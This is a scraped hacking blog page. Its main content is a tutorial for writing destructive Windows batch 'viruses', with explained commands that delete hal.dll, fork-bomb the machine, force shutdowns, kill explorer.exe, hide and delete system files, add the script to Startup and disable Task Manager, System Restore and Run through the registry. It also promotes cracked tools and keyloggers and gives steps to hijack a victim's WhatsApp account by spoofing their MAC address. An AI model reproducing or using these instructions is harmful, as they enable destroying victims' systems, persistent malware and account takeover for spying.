del "%systemdrive%\windows\system32\hal.dll"
now your virus will not be confused anymore, since you have placed %systemdrive% telling that 'okay i dont know where is the operating system is installed,so it is up to you now to find our target' then the virus would say 'roger that!'. Now it doesn't matter anymore if the operating system is installed in C or not..If the batch file didn't saw drive C then it will jump to D, then if it didn't found D, it will go to E - Z
if you already mastered this tutorial, please do not share this knowledge to others, it is forbidden.
- memory dump virus
- force shutdown
- file infecting
- file moving
- file copying
- file deleting
- file hiding
- task killing virus
- launch virus every startup
- swap left click and right click mouse buttons
- disabling system restore
- disabling task manager
- disabling folder options
- disabling run
- disabling right click on desktop
echo "im a virus programmer"
pause
@echo off - this will not display the directory.
echo - use to print strings.
pause - waits for the user to press any key before exiting.
msg * im a virus programmer
msg * - used to display an alert message.
--------------------------------------------------------------------------------------------------------------
:a
start %0
goto :a
shutdown -s -f -t 30 -c "your owned!"
-s - means shutdown the computer, you can also use -r - this will restart he computer.
-f - forcely terminates running program.
-t - use to set time
30 - number of seconds before shutdown
-c - comment
ren "C:\windows\notepad.exe" "infected.exe"
ren - rename, use rename files
"C:\windows\notepad.exe" - the directory of the file that you want to infect.
"infected.exe" - the name of the file that you want to be replaced to the original file.
taskkill /f /im explorer.exe
taskkill - use to terminate a process
/f - forcely termination of the process
im - this specifies the image name, specifies a process.
explorer.exe - the image, the process that you wanted to terminate.
del "C:\windows\notepad.exe" /q
/q - means dont prompt user,silent mode,just delete the file.
c:\windows\notepad.exe - the directory of the file,notepad .exe is the file that we want to delete
move /y file.bat "C:\windows\system32"
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
copy /y file.bat "c:\windows\system32"
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
attrib +h "c:\windows\notepad.exe"
+h - use to hide a file, -h if you want to unhide a file
c:\windows\notepad.exe - the destination of the file we want to hide,notepad.exe is the target file
-------------------------------------------------------------------------------------------------------------
attrib +h "C:\windows\system32\file.bat"
/t - type of registry key
/d - the destination of the file
/f - force to create a registry key
copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup"
attrib +h copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup\file.bat"
rundll32 user32.dll, SwapMouseButton
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
REG add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v NoFolderOptions /t REG_DWORD /d 1 /f
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
--------------------------------------------------------------------------------------------------------------
of course in some cases your virus will not work unless your codes are specified for a certain drive.
del "C:\windows\system32\hal.dll" /q
del "%systemdrive%\windows\system32\hal.dll"
06:57
Get the 6 New Latest Hacking Tools
Acunetix Web Vulnerability Scanner 8 Cracked Version
Skyneos Keylogger
SQL power Injector
Emmisaary Keylogger
Star Tools 2.0
Blind Cat SQL Injection Tool
06:21
Hacking whats app
How To Spy On Someone Else Whats AppAccount !
Step 1 :- First, uninstall Whats App from yourphone.
Step 2 :-Now you need to have the victim
phone’s Media access control (MAC) address.
Different OS have different way of finding
Media access control (MAC) address. Here’s
how to find victims MAC address :
For Android - Head over to settings—> About
phone—> Status—> Wi-Fi MAC address.
For iPhone - Head over to Settings—> General
—> About—> Wi-Fi address.
For Windows Phone - Head over to Settings—> About—> More info—> MAC address.
For BlackBerry - Head over to options—>
Device—> Device and Status info—> WLAN
MAC
Step 3 :-After installing terminal app and
BusyBox on your Android.Open Terminal app
from your Android and follow the instructions
for spoofing the MAC address provided in This
Link. If you followed the steps successfully,
you will certainly end up with a spoofed MAC
address.
Step 4 :-Now re-install WhatsApp on your
phone, enter victims phone number and
verify your account by entering the
verification code received on victim’s phone.!
06:11